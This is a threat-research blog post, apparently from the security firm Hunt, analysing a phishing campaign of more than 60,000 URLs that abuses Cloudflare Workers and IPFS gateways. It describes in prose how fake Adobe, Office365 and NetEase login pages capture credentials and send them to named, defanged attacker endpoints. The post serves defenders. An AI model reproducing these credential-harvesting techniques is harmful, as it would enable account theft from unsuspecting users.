One Font, Countless Frauds: Exposing Large-Scale Phishing Activity Abusing Cloudflare

Introduction

At Hunt, we seek to move beyond open directories and malware C2 frameworks. Our research team actively seeks out emerging threats using innovative tools like our experimental phishing crawler. Our commitment to ensuring our users and the broader security community are aware of ongoing threats led us to identify a widespread phishing campaign leveraging Cloudflare services.

What tipped us off? A shared Font Awesome kit across a massive number of websites hosting fake login pages. This discovery led us to over 60,000 links, most targeting login credentials for Microsoft's SharePoint and Office365 platforms. The campaign wasn't limited to Microsoft products; we've also encountered pages imitating DHL, Webmail Panels, and Mercari, to name a few.

In this post, we'll share some of the details of this interesting set of URLs in hopes it will help identify this threat before it hits your inbox.

What is Font Awesome?

Font Awesome is a popular library that easily integrates icons and fonts into web pages. Threat actors may find this toolkit (with over 30,000 items to choose from) valuable in tailoring the look of their phishing pages to create a sense of normalcy and trust for the user, making them less likely to suspect the phishing attempt.

In this case, the particular Font Awesome kit used across the cluster of phishing domains is at https://kit[.]fontawesome[.]/585b051251.js.

The script's primary purpose is to manage the kit's configuration and loading of Font Awesome icons. It includes automatic SVG fetching (which requires a license), conflict detection, handling dynamic content changes, and ensuring icons are obtained from the correct location.

Phishing Activity Details

As all the phishing domains we found are hosted on Cloudflare, it's only fitting that they use their services. In this activity set, the scammers used either Cloudflare IPFS Gateways, distributing content from a decentralized network, or Cloudflare Workers, a serverless execution environment, to mask their malicious intent. *A handful do not use either service.

Below is a quick explantion of how threat actors can abuse these services:

• IPFS Gateways: Phishing actors can exploit IPFS gateways to host phishing content in a decentralized manner, making it potentially more challenging to track down and take down.

• Cloudflare Workers: While a legitimate service, malicious actors can misuse Cloudflare Workers to host phishing content or other malicious scripts, potentially making them appear to originate from a trusted source (Cloudflare).

We won't attempt to analyze all 60,000+ URLs in this post. Let's dive into a few examples to understand better how these phishing actors operate.

ogukbm[.]nmbzts2qjn2150[.]workers[.]dev

The first link we will cover is hosted via CF Workers. It pretends to be an Adobe document, requiring users to enter their email credentials. The source code of the page is obfuscated by HTML character encoding. However, we can get around this by inspecting the page using the Web Developer tools.

The arrow near the top of the page highlights the Font Awesome 585b051251 script, and the second arrow shows JavaScript code buried at the bottom of the page. This code appears to deal with login functionality. Let's take a closer look.

Below is a brief breakdown of the code in Figure 4:

1. The code checks for a value in the URL hash and uses it to pre-fill the email field (#email) if it exists.

2. Upon submission of the form, the code prevents the default form submission behavior, retrieves the values from the email and password fields, and then clears the password field.

3. An error message indicates login failure, incrementing the counter (count) variable to track login attempts.

4. After two failed attempts, the page redirects the user to the official Adobe website (line 24).

5. Next, the code uses regex to validate that the information entered in the email field matches the basic structure of an email address.

6. Finally, if the count variable is less than 2, the code extracts the email and password and sends an AJAX request to https://ugiuk[.]dyndns[.]dk/sign4/Adobe.php.

*At the time of writing, the URL accepting the credentials is no longer responding.

weston1.html

Our second example leverages an IPFS gateway and a seemingly innocuous HTML page ('weston1.html') consisting of a Microsoft Word document to target Office365 credentials. The page also offers a "Sign in with Other Mail" option, suggesting a wider net for potential victims.

Again, in Figure 5, identified by the arrows, are the Font Awesome script and a slightly more complex script are buried at the bottom of the page.

The above image only includes the portion of code used to send the credentials to what is likely an actor-controlled server. The actual script was a few hundred lines; I'll provide a quick overview:

1. The script initializes a dialog box/popup window containing an embedded login image for Gmail, Outlook, AOL, Office365, Yahoo, and 'Other'.

2. Like the first script, the code validates the email address input into the email field and sends the credentials to https://usefuxoil[.]shop/high/boloadobe.php.

3. The code redirects the user to a URL using the domain extracted from the user's email, even if the login was unsuccessful.

biocareremedies[.]in/admin/em/mnx/

Our third and final example is an oddity among the large group of URLs identified. In the URL above, we see a domain likely spoofing some type of healthcare organization but also using India's top-level domain (TLD). The domain isn't uncommon, but the phishing page contains the title "NetEast Enterprise Email -- Login Portal," with a login field over presumably the target's LinkedIn page.

The login field reads, "Email login timeout, please login again." NetEase is a large free e-mail provider within China, and the page uses a similar favicon often seen on 163[.]com webpages.

A significant difference between the code in Figure 8 and the others we've looked at is that the attacker has decided not to send the credentials to additional infrastructure but to a PHP page. At the beginning of the script, a base64-encoded string (bmV4dC5waHa=), which decodes to 'next.php,' is initialized.

We can easily navigate to this page in the browser.

Conclusion

The continued rise of IPFS phishing highlights the need for security solutions that can adapt and learn. Anomaly detection tools that analyze traffic patterns and identify deviations from normal behavior offer a powerful approach to uncovering novel threats.

Sign up for Hunt today and be among the first to know when our crawler goes live. We will continue to inform the community as new phishing threats appear.